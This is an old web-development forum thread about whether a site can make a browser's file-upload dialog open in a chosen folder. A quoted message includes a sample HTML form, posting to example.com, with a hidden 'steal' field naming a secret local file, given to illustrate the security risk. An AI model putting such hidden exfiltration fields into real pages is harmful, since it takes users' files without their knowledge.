|
|
Posted by Jochem Maas on 01/19/06 16:02
are you sure it was not internet explorer just showing you the last
directory you had opened with a 'browse...' button with in that browsing
session?
Jay Blanchard wrote:
> [snip]
>
>>Along these same lines, does anyone know how to make the file dialog
>>start
>>in a specific directory? I saw this the other day but forgot where. I
>>clicked browse and the dialog popped up pointed to My Pictures (which
>>at
>>least works for most Windblows users). I meant to look at the code,
>>but
>>didn't....
>
>
> Yikes!
>
> If it *DOES* work, you've probably got yet another security problem in
> Windows.
>
> Suppose, for example, that I do something like this:
>
> <form action="http://example.com/" method="post"
> enctype="multipart/form-data">
> <input style="visibility: hidden" name="steal"
> value="C:\path\to\commonly\used\secret\file\I\should\not\get.secret">
> What's your name? <input name="name"><br />
> Who's your daddy? <input name="daddy"><br />
> <input type="submit">
> </form>
>
> Now, the unsuspecting user will be HANDING me the file I shouldn't
> have without ever seeing anything about it.
>
> Even if it "only" lets you pick the directory, but not the file, it
> probably exposes too much information about my desktop for my tastes.
> [/snip]
>
> Now I need to go back and find it. It was a site having to do with photos,
> but I was doing research and visited a lot of them. Since the upload dialog
> was looking for photos you can see where the apparent convenience could come
> in. But you're right....as a security hole it is big enough for aircrafy
> carrier usage.
>
Navigation:
[Reply to this message]
|